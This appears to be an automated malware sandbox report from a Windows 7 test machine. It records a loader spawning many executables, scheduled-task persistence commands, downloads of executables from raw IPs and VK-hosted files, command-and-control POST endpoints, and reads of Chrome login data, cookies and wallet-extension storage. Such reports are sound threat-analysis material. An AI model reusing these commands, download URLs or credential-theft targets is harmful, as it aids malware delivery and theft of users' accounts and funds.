Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Sept. 6, 2023, 7:39 a.m. | Sept. 6, 2023, 7:42 a.m. |
-
-
-
EPOgquOT1MnP1nqso8haYw46.exe "C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe"
1536-
regsvr32.exe "C:\Windows\System32\regsvr32.exe" /U .\VVTQR9K.VA3 -s
3040
-
-
U_WUTTisAZX3VLe2b40_scVK.exe "C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe"
2760 -
nPtRtTHIn9wndsrAGmvS3n2G.exe "C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe"
2752-
vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2608
-
-
sVRSTvhMzuBInyoVatf1LIkj.exe "C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe"
1616-
-
Install.exe .\Install.exe /rpdidWAf "525403" /S
1784
-
-
-
Ms6gVLaCMj3QjsT0nxwUAzQV.exe "C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe"
2756 -
x7v28_ox_gsKhD1Q9EW3AnPz.exe "C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe"
1332 -
kSIDO1g7b2Ov3jXySZx1v2JG.exe "C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe"
1308
-
-
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
2816 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
2884
-
IP Address | Status | Action |
---|---|---|
176.123.9.85 | Active | Moloch |
185.225.74.51 | Active | Moloch |
104.18.145.235 | Active | Moloch |
104.18.146.235 | Active | Moloch |
104.21.59.53 | Active | Moloch |
104.244.42.65 | Active | Moloch |
104.26.5.15 | Active | Moloch |
104.26.9.59 | Active | Moloch |
121.254.136.18 | Active | Moloch |
141.95.126.89 | Active | Moloch |
148.251.234.93 | Active | Moloch |
149.154.167.99 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.193.129 | Active | Moloch |
172.67.197.101 | Active | Moloch |
172.67.75.163 | Active | Moloch |
172.67.75.166 | Active | Moloch |
179.43.158.2 | Active | Moloch |
185.225.73.32 | Active | Moloch |
193.42.32.118 | Active | Moloch |
208.67.104.60 | Active | Moloch |
213.180.204.24 | Active | Moloch |
23.32.56.80 | Active | Moloch |
34.117.59.81 | Active | Moloch |
45.15.156.229 | Active | Moloch |
45.9.74.80 | Active | Moloch |
62.217.160.2 | Active | Moloch |
77.88.55.60 | Active | Moloch |
85.208.136.10 | Active | Moloch |
87.240.129.133 | Active | Moloch |
87.240.137.140 | Active | Moloch |
93.186.225.194 | Active | Moloch |
94.142.138.131 | Active | Moloch |
94.156.253.187 | Active | Moloch |
95.142.206.0 | Active | Moloch |
95.142.206.1 | Active | Moloch |
95.142.206.3 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49166 77.88.55.60:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai | e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24 |
TLSv1 192.168.56.101:49177 104.26.5.15:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49167 62.217.160.2:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru | 6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2 |
TLSv1 192.168.56.101:49176 104.26.5.15:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49168 213.180.204.24:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru | f0:52:26:54:41:65:2b:6a:37:7b:c1:5b:de:9c:e9:d4:41:c6:81:2d |
TLSv1 192.168.56.101:49171 172.67.193.129:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=ironhost.io | 1f:0b:7a:47:6b:7f:71:b9:9c:82:0e:4f:f5:e8:7c:05:28:03:e7:8e |
TLSv1 192.168.56.101:49193 93.186.225.194:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49207 172.67.197.101:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=preconcert.pw | 60:b2:a3:3e:2f:80:57:cd:6f:c1:a3:e9:b3:c6:cb:95:41:83:4a:64 |
TLSv1 192.168.56.101:49205 104.21.59.53:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=sergejbukotko.com | f1:9c:9e:67:d8:1b:22:61:4a:4d:a0:fc:b3:45:84:76:9e:9d:2d:27 |
TLSv1 192.168.56.101:49240 95.142.206.3:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49239 93.186.225.194:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49249 95.142.206.1:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49231 93.186.225.194:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49243 93.186.225.194:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49248 93.186.225.194:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49186 172.67.75.163:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65 |
TLSv1 192.168.56.101:49238 93.186.225.194:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49242 87.240.137.140:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49245 95.142.206.0:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49244 93.186.225.194:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49246 87.240.137.140:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.101:49280 104.26.5.15:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49279 172.67.75.166:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.101:49288 87.240.129.133:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49297 87.240.129.133:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.101:49264 104.26.9.59:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65 |
TLSv1 192.168.56.101:49298 95.142.206.1:443 |
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | .vmp0 |
section | .vmp1 |
section | .vmp2 |
resource name | PNG |
resource name | None |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://193.42.32.118/api/tracemap.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://94.142.138.131/api/tracemap.php | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://94.142.138.131/api/firecom.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://94.156.253.187/download/WWW14_n.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://94.156.253.187/download/WWW14_n.exe | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://94.142.138.131/api/firegate.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://45.15.156.229/api/tracemap.php | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://45.15.156.229/api/firegate.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://45.9.74.80/ummaa.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://45.9.74.80/super.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://45.9.74.80/ummaa.exe | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://45.9.74.80/super.exe |
request | GET http://193.42.32.118/api/tracemap.php |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://94.142.138.131/api/tracemap.php |
request | POST http://94.142.138.131/api/firecom.php |
request | GET http://www.maxmind.com/geoip/v2.1/city/me |
request | HEAD http://94.156.253.187/download/WWW14_n.exe |
request | GET http://94.156.253.187/download/WWW14_n.exe |
request | POST http://94.142.138.131/api/firegate.php |
request | HEAD http://red.mk/netTime.exe |
request | GET http://red.mk/netTime.exe |
request | GET http://45.15.156.229/api/tracemap.php |
request | POST http://45.15.156.229/api/firegate.php |
request | HEAD http://45.9.74.80/ummaa.exe |
request | HEAD http://45.9.74.80/super.exe |
request | GET http://45.9.74.80/ummaa.exe |
request | GET http://45.9.74.80/super.exe |
request | HEAD http://230809204625331.nes.dtf99.top/f/fikim0809331.exe |
request | GET http://230809204625331.nes.dtf99.top/f/fikim0809331.exe |
request | GET https://yandex.ru/ |
request | GET https://dzen.ru/?yredirect=true |
request | GET https://sso.passport.yandex.ru/push?uuid=bc95c885-a33d-4f0b-a172-5792d56f2b99&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue |
request | GET https://db-ip.com/ |
request | POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self |
request | GET https://api.myip.com/ |
request | GET https://vk.com/doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 |
request | GET https://sergejbukotko.com/7725eaa6592c80f8124e769b4e8a07f7.exe |
request | GET https://preconcert.pw/setup294.exe |
request | GET https://vk.com/doc44017378_668841700?hash=B7naXG9fPpueUKaZxzbzFzqgThiLopd9A232GVSoLbD&dl=VDCn0RuU4RRcIuzpA6hHZu4JCvVt7UCUAmWFRORbSKs&api=1&no_preview=1 |
request | GET https://vk.com/doc44017378_668913178?hash=82bcV2gCZ1FH8Z8HToaxuiwCiEN2mz2z1qfoXJTCPC0&dl=ErxeeY7X3LIyZIBiZ0QDMkzCLk2vvDO29uX36h22aek&api=1&no_preview=1#u9 |
request | GET https://sun6-23.userapi.com/c909618/u44017378/docs/d58/502f8d1b7c6f/Synapse.bmp?extra=7ymvw_aFwN4_Uj7FsOWPKcOeA3Uvoj8EikYjHvdatt0X3JP-3DmTnc04rqW9o15Tpv6WRsx3NGvtPS7zQz6ZuNvop6Jj1TXski6zguIEMge-ITDtAes8MpdXIiCKNbvKN4nbBz6NMzSp29ZK |
request | GET https://vk.com/doc44017378_668679037?hash=6lxdrm9NUkSryZCfzYZn4zR2sOTXzaKgfQIcVCaPnvX&dl=FLqYTpktPSSWsXhtSyyzRawRyuZZexn7WIKXiXEZBv4&api=1&no_preview=1 |
request | GET https://psv4.userapi.com/c909328/u44017378/docs/d20/80a165d7642a/3c8fttmg7n06dp.bmp?extra=nuZcn5b8fGh0uPRKfbUAXX0VAMxL-cYveJG88PCotdD--pDq-7gxijOyIWQPtaUUAWSIRH_w1wstuzNboJLwKcBxW1Y6MIjCb1xhxyymyAxolfvAbMP9rCDe9gfZUPLDuOK0pAEC8-MuwAkw |
request | GET https://sun6-20.userapi.com/c909618/u44017378/docs/d36/c9a88b9c7135/PL_Client.bmp?extra=tJtT3z6UbzYseJPa76j1zRBj1wmyid3YaDvAzaMsz31tqOzwexxS6SL75PPvYs4H2kzJbhj1WI3RcZekL6A_lMuCQ7wlgzvR82UbZKpo_7rDNXDLKPfZIU6wTZ5q87vSoPPRjK5zIRkegmYD |
request | GET https://vk.com/doc44017378_668850966?hash=seNAc9XpZGb24lXnAxVAwPiPVaSTe6IiTQaY7IFhggw&dl=A9mazd4TmUx700iSSJAZzZTPnbX30hG5PEtIhQs2FVw&api=1&no_preview=1#utube |
request | GET https://vk.com/doc44017378_668685574?hash=2Z9kWDMxHv9Bg52ieOFMjjyZlIe2LzZhpXJtbJfi2jD&dl=MckLSTrLnFqxzbDQcQsY8zw8KxvNLWnEyU8AMbhyK6s&api=1&no_preview=1#WW1 |
request | GET https://sun6-21.userapi.com/c909628/u44017378/docs/d11/7f1a7c274f11/WWW1.bmp?extra=ibUwsIlBLQfXz5F54C2lVB4_UNTN1SYsuHJjPdJG1kmKXbQKYUdmzOpzkBzvq_CQ0kTWEzPmDitIXdL62nwV1Wz6vYHp9FTHjt_sDl-d0N1MlyijNg1uwrPaBxnTvlsmksXyhzo9dFkQw3Dx |
request | GET https://vk.com/doc44017378_668897025?hash=9izn0TzhC6Gq52AYs6wKluNJs8IMGa5IygoIE2NWiZX&dl=RzpPQgkrU5Bo3xTNnupfnzibo1sU36B0QqzJYdEUq3c&api=1&no_preview=1#redcl |
request | GET https://psv4.userapi.com/c235131/u44017378/docs/d5/eb6fe76df516/red.bmp?extra=ME0T5ttRod9kvT9aKKSwe-oAdBL69d6YUKjB4zWwRSSWsFL7VU3KidZTPIhbjE0zWgoso1_RHm-VuqcNV5k7SY-fZDpTkZFPHptlTeudtXPzawqATgpx9GnpEDrul3HPvZeDLFV3JEzI7tmA |
request | GET https://vk.com/doc44017378_668777192?hash=bErtt2Itw8CZPTouyuXblBKb3pLfVImQzvGWnZ4CyVs&dl=vm2AArvcYQaQAETnMlmPKTg0CoqMAAqRh2fogvAYbWP&api=1&no_preview=1#tmwvr |
request | GET https://sun6-21.userapi.com/c235131/u44017378/docs/d58/cc01f1bebaed/tmvwr.bmp?extra=q1LcznyK48tN8Wen35rZ4SsDNwN0UeWZ55tLITfBZg-6OTIEQfzGqel91B2rOXtWrIKTnt-LHmOoR4Rgiv5jb_s-93At_nSn5l0lxswHLYTdEqposLIc_-NG6GXefWaiEN4nocBNujY4KphO |
request | POST http://94.142.138.131/api/firecom.php |
request | POST http://94.142.138.131/api/firegate.php |
request | POST http://45.15.156.229/api/firegate.php |
request | POST https://api.db-ip.com/v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self |
domain | preconcert.pw | description | Palau domain TLD | ||||||
domain | yandex.ru | description | Russian Federation domain TLD | ||||||
domain | iplis.ru | description | Russian Federation domain TLD | ||||||
domain | sso.passport.yandex.ru | description | Russian Federation domain TLD | ||||||
domain | dzen.ru | description | Russian Federation domain TLD | ||||||
domain | 230809204625331.nes.dtf99.top | description | Generic top level domain TLD |
description | qZa2Z7Puv7E4iAuW3ONvhvPf.exe tried to sleep 133 seconds, actually delayed analysis time by 133 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Temp\7zSEAF2.tmp\Install.exe |
file | C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe |
file | C:\Users\test22\Pictures\Minor Policy\hqwRTbVrg6JO8voBy_voyZiR.exe |
file | C:\Users\test22\Pictures\Minor Policy\qUbgMoNM2GXIKNuZhrcGVO8V.exe |
file | C:\Users\test22\Pictures\Minor Policy\1gOAmuVXzOKI5MyMYhf8xuu4.exe |
file | C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe |
file | C:\Users\test22\AppData\Local\Temp\7zSE0B1.tmp\Install.exe |
file | C:\Users\test22\Pictures\Minor Policy\qyFjl2MYt6qjym_635ASMf8k.exe |
file | C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe |
file | C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe |
file | C:\Users\test22\Pictures\Minor Policy\U5Uc9En5niLiOuW0y1E0qzQw.exe |
file | C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe |
file | C:\Users\test22\Pictures\Minor Policy\Xk9zE3Cf0Cb9GHLSDNfQ7RMz.exe |
file | C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe |
file | C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe |
file | C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe |
cmdline | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST |
cmdline | "C:\Windows\System32\regsvr32.exe" /U .\VVTQR9K.VA3 -s |
cmdline | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST |
cmdline | regsvr32 /U .\VVTQR9K.VA3 -s |
file | C:\Users\test22\Documents\qZa2Z7Puv7E4iAuW3ONvhvPf.exe |
file | C:\Users\test22\Pictures\Minor Policy\EPOgquOT1MnP1nqso8haYw46.exe |
file | C:\Users\test22\Pictures\Minor Policy\U_WUTTisAZX3VLe2b40_scVK.exe |
file | C:\Users\test22\Pictures\Minor Policy\nPtRtTHIn9wndsrAGmvS3n2G.exe |
file | C:\Users\test22\Pictures\Minor Policy\sVRSTvhMzuBInyoVatf1LIkj.exe |
file | C:\Users\test22\Pictures\Minor Policy\Ms6gVLaCMj3QjsT0nxwUAzQV.exe |
file | C:\Users\test22\Pictures\Minor Policy\x7v28_ox_gsKhD1Q9EW3AnPz.exe |
file | C:\Users\test22\Pictures\Minor Policy\kSIDO1g7b2Ov3jXySZx1v2JG.exe |
file | C:\Users\test22\AppData\Local\Temp\VvTQR9K.VA3 |
wmi | <INVALID POINTER> |